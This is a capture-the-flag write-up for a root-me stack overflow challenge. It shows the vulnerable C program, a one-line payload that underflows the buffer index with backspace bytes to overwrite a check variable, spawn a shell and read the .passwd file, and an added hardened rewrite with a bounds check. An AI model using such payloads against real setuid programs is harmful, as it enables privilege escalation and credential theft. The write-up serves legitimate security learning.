ELF x86: Stack buffer overflow basic 3
root-me challenge: An intermediate level to familiarize yourself with stack overflows.
Environment configuration:
PIE (Position Independent Executable): No
RelRO (Read Only relocations): Yes
NX (Non-Executable Stack): Yes
ASLR (Address Space Layout Randomization): No
SF (Source Fortification): No
SSP (Stack-Smashing Protection): No
SRC (Source code access): Yes
Source code:
```c
#include <stdio.h>
#include <sys/time.h>
#include <sys/types.h>
#include <unistd.h>
#include <stdlib.h>

void shell(void);

int main()
{
    char buffer[64];
    int check;      /* never assigned by the program itself */
    int i = 0;
    int count = 0;

    printf("Enter your name: ");
    fflush(stdout);
    while(1)
    {
        /* Only prints a message; the loop keeps running */
        if(count >= 64)
            printf("Oh no...Sorry !\n");
        if(check == 0xbffffabc)
            shell();
        else
        {
            /* Read a single byte of input into i */
            read(fileno(stdin),&i,1);
            switch(i)
            {
                case '\n':
                    printf("\a");
                    break;
                case 0x08:
                    /* Backspace: count is decremented with no lower bound */
                    count--;
                    printf("\b");
                    break;
                case 0x04:
                    printf("\t");
                    count++;
                    break;
                case 0x90:
                    printf("\a");
                    count++;
                    break;
                default:
                    /* Store at whatever index count currently holds */
                    buffer[count] = i;
                    count++;
                    break;
            }
        }
    }
}

void shell(void)
{
    setreuid(geteuid(), geteuid());
    system("/bin/bash");
}
```
Four \x08 bytes decrease the value of count by 4, so that buffer[count] reaches the check variable, which needs to be 0xbffffabc (mind the endianness):
```
app-systeme-ch16@challenge02:~$ cat <(python -c "print '\x08'*4 + '\xbc\xfa\xff\xbf'") - | ./ch16
cat .passwd
```
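The flaw in the loop above and one way to close it, as an added example that is not part of the original write-up or the challenge source: oob_stores_original replays the loop's index arithmetic without writing anything and counts the stores that would fall outside buffer, while read_name_hardened is a hypothetical rewrite that clamps the index. The function names, NAME_CAP, g_name and the sample bytes are assumptions made for this example.

```c
#include <stdio.h>
#include <stddef.h>

#define NAME_CAP 64

/* Constructed sample: four backspaces, then four placeholder bytes. */
static const unsigned char SAMPLE[] = { 0x08, 0x08, 0x08, 0x08, 'A', 'B', 'C', 'D', '\n' };
static char g_name[NAME_CAP];

/* Replays the challenge loop's index arithmetic without storing anything
 * and counts the stores that would land outside buffer[0..63]. */
static int oob_stores_original(const unsigned char *in, size_t len)
{
    int count = 0, oob = 0;
    for (size_t k = 0; k < len; k++) {
        switch (in[k]) {
        case '\n': break;
        case 0x08: count--; break;              /* no lower bound */
        case 0x04: case 0x90: count++; break;
        default:                                /* buffer[count] = i; */
            if (count < 0 || count >= NAME_CAP) oob++;
            count++;
            break;
        }
    }
    return oob;
}

/* Hardened variant (hypothetical): backspace stops at index 0, stores stop
 * at NAME_CAP - 1, newline ends input. Returns the number of bytes kept. */
static size_t read_name_hardened(const unsigned char *in, size_t len, char *buf)
{
    size_t count = 0;
    for (size_t k = 0; k < len && in[k] != '\n'; k++) {
        if (in[k] == 0x08) { if (count > 0) count--; continue; }
        if (in[k] == 0x04 || in[k] == 0x90) continue;   /* dropped, no slot skipped */
        if (count < (size_t)(NAME_CAP - 1)) buf[count++] = (char)in[k];
    }
    buf[count] = '\0';
    return count;
}

int main(void)
{
    printf("original: %d out-of-bounds stores\n", oob_stores_original(SAMPLE, sizeof SAMPLE));
    printf("hardened: %zu bytes kept\n", read_name_hardened(SAMPLE, sizeof SAMPLE, g_name));
    return 0;
}
```

Compiling the original with SSP would not catch this particular write, since it lands below the buffer rather than over the canary; the bounds check on the index is the actual fix.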